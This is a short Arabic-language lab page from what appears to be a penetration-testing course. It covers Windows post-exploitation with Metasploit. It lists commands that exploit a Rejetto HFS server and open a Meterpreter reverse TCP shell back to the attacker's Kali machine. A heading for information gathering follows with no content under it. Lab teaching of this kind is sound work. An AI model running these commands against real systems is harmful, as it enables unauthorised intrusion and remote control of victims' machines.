🧪 المختبر العملي 17: وحدات ما بعد الاستغلال في Windows (Windows Post Exploitation Modules Lab)
📊 مرحلة الاستغلال (Exploitation)
msfconsole -quse exploit/windows/http/rejetto_hfs_exec set RHOSTS [Target_IP_Address] set LHOST [Your_Kali_IP_Address] set LPORT 4444 set PAYLOAD windows/meterpreter/reverse_tcp exploit
backgroundsessions
📊 مرحلة ما بعد الاستغلال (Post-Exploitation): جمع المعلومات
Previous🧪 المختبر العملي 16: ترقية أصداف الأوامر إلى أصداف Meterpreter (Upgrading Command Shells To MeteNext🧪 المختبر العملي 18 : تجاوز التحكم في حساب المستخدم (UAC Bypass – Memory Injection Lab)
Last updated

